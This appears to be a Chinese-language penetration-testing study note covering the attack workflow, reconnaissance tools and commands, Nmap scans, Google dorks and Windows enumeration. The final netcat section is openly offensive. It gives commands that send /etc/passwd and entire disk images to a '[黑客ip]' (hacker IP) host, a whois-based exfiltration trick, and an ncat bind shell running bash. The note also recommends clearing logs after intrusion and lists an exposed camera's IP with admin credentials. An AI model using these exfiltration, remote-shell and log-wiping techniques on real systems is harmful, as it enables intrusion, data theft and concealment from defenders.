渗透测试之信息搜集专题

渗透测试全流程：

1.信息搜集：

1.获取域名whois信息（邮箱，电话，使用社工库查看泄露密码。尝试登录后台，邮箱-->搜索引擎查询--->社交账号，管理员生成密码的习惯，生成密码字典）

2.查询服务器子站点，因为主站很难，可以查看是否有某个CMS或者其他漏洞

3.看其ip地址，进行端口的扫描，进行漏洞探测，看是否有mysql，web服务器，ftp，ssh，3389......  尝试弱口令，管理员设置的缺陷，敏感文件泄露

4.查看服务器操作系统版本，nmap -o可以查，web中间件（是否有iis apache nginx tomcat... ）对应相应的版本是否存在已知的漏洞

，是否存在已知漏洞（iis解析漏洞）

5.扫描网站目录结构（robots.txt  目录遍历  敏感文件泄露）

(iis+access 数据库xxx.db可以直接用迅雷下载下来)，有些web服务器刚装完会留下php探针等，可以用于推测，文件上传相关的

6.Google hacking进一步探测网站信息，Shodan hacking，Fofa hacking等搜索引擎

（后台，敏感文件(姓名，身份证号，生日，银行卡等等，可以造成撞库)）

2.漏洞扫描：

开始检测漏洞，sql注入，文件上传，xss，xsrf（csrf，ssrf），代码执行，命令执行，越权，目录读取，任意文件读取，文件下载

文件包含，编辑器，暴力破解....

3.漏洞利用：

以上方法拿到webshell

4.权限提升：

windows：

windows低版本漏洞（iis6，pr，巴西烤肉，mysql udf提权，serv-u提权）

Linux：

很多很多

5.远程连接：

6.日志清理：

msf日志清理工具

面对目标的时候：

1.判断语言（index.php/asp/jsp/aspx...）

2.扫描器扫描（dir目录，db数据库，php敏感文件）

3.使用综合的网站扫描工具进行扫描

4.提权

参考理论框架：

渗透测试执行标准PTES（见补充的ppt）

（1）明确目标

（2）信息搜集 （情报战）

（3）漏洞检测

（4）漏洞验证

（5）信息分析

（6）获取所需

（7）信息整理

（8）形成报告

（1）信息搜集（网络空间情报战）（情报侦察）

自动化情报侦察工具 SpiderFoot（有pdf说明使用语法）

(其他)Masscan  OpenVAS  OWASP  ZAP  Vulnerability  Scanner  AppScan Recon-ng  Gobuster  Amass

威胁情报平台 1.（TIP）CRITS  2.MISP   3.OpenCTI 

Whois信息：可以获取关键注册人的信息，包括注册公司、注册邮箱、管理员邮箱、管理员联系手机等,对后期社工很有用。

包括人物侦察等，可以获得用户的相关信息，邮箱，社交，电话等。

参考工具： （邮箱）h8mail  theHarvester GHunt  (社交)sherlock social-analyzer  (电话)Phoneinfoga

目标ip：在渗透测试过程中得到目标的真实IP某些场景非常重要，例如通过sql注入得到了数据库账号密码。想要连接目标数据库、想在目标上正向一个shell、建立一个socket通道等等， 都需要服务器的真实ip。但目前大部分网站都加了 CDN,CDN的虚假IP干扰了我们的渗透测试，如何绕过CDN查找到目标的真实IP，对我们来说非常重要。 多个地点Ping服务器,网站测速 - 站长工具：通过多地ping判断是否开启cdn

破除目标的CDN：内容分发网络

CDN服务：大型企业都购买了这样的服务。多个地方都有节点服务器，节点服务器会去请求源服务器，把前端内容缓存到节点服务器中，相当于分身了网页。

                这样可以加速前端网页的访问速度，可以向最近的节点服务器请求内容，而提高了效率

那么如何找到网站的真实ip呢？（练习：https://www.wgzbh.com）

1、查询子域名对应的IP。（ 由于CDN很贵，一般都是主站加上cdn，所以子域名的ip更有可能是真实的ip地址）

2、开启国外的代理，从国外进行查询ip操作 （ 可能只购买了国内的节点。没有全球加速，所以也有可能查到真实ip）

 3、网络空间引擎搜索法（shodan，fofa搜索） （举例： http://200.109.57.51:8080/view2.html 账号admin 密码空 摄像头） （搜索引擎的搜索语法记忆）

4、查询历史DNS记录 （百度网站很多）

5、目标站点敏感文件泄露 （readme.txt 运维人员忘记删除了，一般会有很多账号密码 内网网段等信息 .git .zip）(工具可以跑)

 6、开发人员安全意识不够，在github上有项目信息（可能只是为了项目展示 会导致敏感信息泄露）

旁站C段查询：

在渗透测试过程中如果目标站实在无懈可击，那就可以尝试从 同服务器部署的其他网站入手，拿下目标服务器的同时目标站也拿下了。

旁站C段在线查询： 同IP网站查询,C段查询,IP反查域名,在线C段,旁站工具 - WebScan   举例：目标站 www.epa.ae的服务器下还部署了其他网站。

子域名查询：

在SRC挖掘和渗透测试过程中，如果目标站体量很大，主站防护严格，那子域名的挖掘就显得异常重要，这些子站可能就是渗透测试的突破口。

子域名挖掘方法： 

在线查询：

  微步在线X情报社区-威胁情报查询_威胁分析平台_开放社区 

https://d.chinacycc.com/index.php?m=login

DNSDB

常用工具： OneForAll子域名挖掘机  Xray安全评估工具  Photon数据爬虫  WhatWeb网站扫描  DNSRecon网站安全评估  Sublist3r子域名收集  子域名挖掘机 Subdomainbrute

开放端口信息：（1-65535）

常用工具：Nmap端口扫描

ssh默认端口22 ftp默认端口为21 apache等80  mysql为3306

服务和安全是相对应的，每开启一个端口，那么攻击面就大了一点，开启的端口越多，也就意味着服务器面临的威胁越大。

扫描端口一般使用nmap，一款扫描开放端口的神器相关命令： 

自行补充 Nmap相关命令使用

nmap 127.0.0.1   （普通扫描，快速） 

nmap -Pn  127.0.0.1    （不以ping的方式进行扫描）（很多服务器禁止ping） 

Nmap -sV -v -p1-65535 192.168.43.9     （不以ping模式 扫描全端口的端口开放情况，且详细打印端口信息）

更推荐第三种扫描方式，更详细的输出且可以跳过防火墙。可以根据扫描出来的端口得知服务器开启了哪些服务并以此来进行攻击点，比如对22端口进行ssh爆破，服务器中间件可能是tomcat等等。

敏感目录/文件：

在程序开发中往往因为权限问题和未对敏感文件进行妥善处理，导致有有备份文件，.git文件等等泄露，往往会导致源码的泄露，危害不容小觑。

扫描这些文件的过程就是一个 字典碰撞的过程，所以扫描结果往往依赖于字典的内容是否强大。

方法： 御剑、kali的dirb、dirbuster、python脚本等等

补充：git泄露，目录爆破

目录收集工具：

disearch   dirmap  JSFinder   破壳web极速扫描器   御剑后台扫描    御剑1.5《想念初恋》

Cms类型

在渗透测试过程中，也有捷径可走，例如得知目标站的cms后，就可以上网搜索此cms的公开漏洞，拿exp进行攻击，往往都是中高危。 

发现方法： 根据cms特性，比如看url路由，前端页面信息 在线查询网站： yunsee.cn-2.0

织梦cms存在多种公开漏洞

Github查询：

通过在github上查询网站的关键字或者路由，来看看有没有值得注意的信息。例如网站源码和账号密码

搜索引擎 （有补充的pdf可以查看学习）

Google Hacking语法

Fofa语法和实践

ZoomEye 钟馗之眼

Shodan Search Engine （Shodan Hacking撒旦黑客语法）

通过谷歌hack语法可以对目标站进行语法定向搜索

例如：寻找找到子域名，目标站的后台地址等等 也可以用来查找互联网上的信息，

例如。 site:sunghsot.cn intext:管理|后台|登录|用户名|密码|验证码|系统|账号|后台管理|后台登录 admin site:edu.cn site: www.sunghost.cn inurl:php?id=

Windows下的信息搜集的常用命令

本地信息搜集

whoami 查看自己身份
whoami /all 获取当前域的信息
ipconfig /all 查看详细ip信息
arp -a 查看arp表
systeminfo 查看操作系统信息
echo %PROCESSOR_ARCHITECTURE% 查看cpu型号
wmic product get name,version 查看安装软件和版本信息
wmic qfe get Caption,Description,HotFixID,InstalledOn 查看补丁列表
net user 查看本地用户
net session 显示本地和远程的会话
wmic process list brief 查看进程
net view 查看内网的共享

远程信息搜集

可以通过一些网站进行信息搜集  这里很多网站已经收藏好了 不多赘述

http://seo.chinaz.com/

http://whois.chinaz.com/

活跃主机识别：

nmap -sP [网段]              例如：nmap -sP 192.168.1.0/24

nping -tcp -p 445 -data [十六进制数据] [目标ip]

对目标ip的445端口，以tcp的方式发送一串十六进制数据 （可以通过以上方法模拟常见网络攻击，可以测试对方的防御效果）

（如果对DDOS的十六进制数据比较熟悉  可以用上述方法模拟常见的网路攻击）

zenmap就是nmap的图形界面版本

服务器指纹识别

nmap -sV [目标ip] 

服务枚举

amap -bq [目标ip] [端口]

使用nc进行扫描

nc -nvz [ip] 1-65535

PS：使用nmap去扫描一些网站 大概率是被防火墙拦截  因为指纹过于明显了  所以需要自行改造软件

kali加密传输

目标：（甚至可以进行n次加密 这样非常安全 甚至无法识别  也可以自己弄一些加密的东西 甚至可以用RSA公钥加密）

cat /etc/passwd | base64 | nc -nv [黑客ip] 3333 -q 1

黑客：

nc -l -p 3333 > kali.txt

传输文件

目标：

nc -nv [黑客ip] 3333 < [要传的文件] -q 1

黑客:

nc -lp 3333 > xx.txt

远程克隆linux硬盘： （远程取证）

黑客：

nc -lp 3333 | dd of=/dev/sda

目标：

dd if=/dev/sda | nc -nv [黑客ip] 3333 -q 1

适用于传输小的文件，whois也可以用于payload反弹 （实践成功）

目标 

whois -h [黑客ip] -p 4444 `cat /etc/passwd | base64`

自己 

nc -l -v -p 4444 | sed "s/ //g" | base64 -d

nc加密版ncat（nc传输的信息都是明文的  所以要么对nc进行加密  要么可以考虑使用ncat）

ncat大多数情况在nmap的工具包里

目标(linux如果是windows系统，bash改成cmd)：

ncat -c bash --allow [黑客ip] -vnl 3333 --ssl    只允许黑客的ip使用加密去控制它

黑客：

ncat -nv [目标ip] 3333 --ssl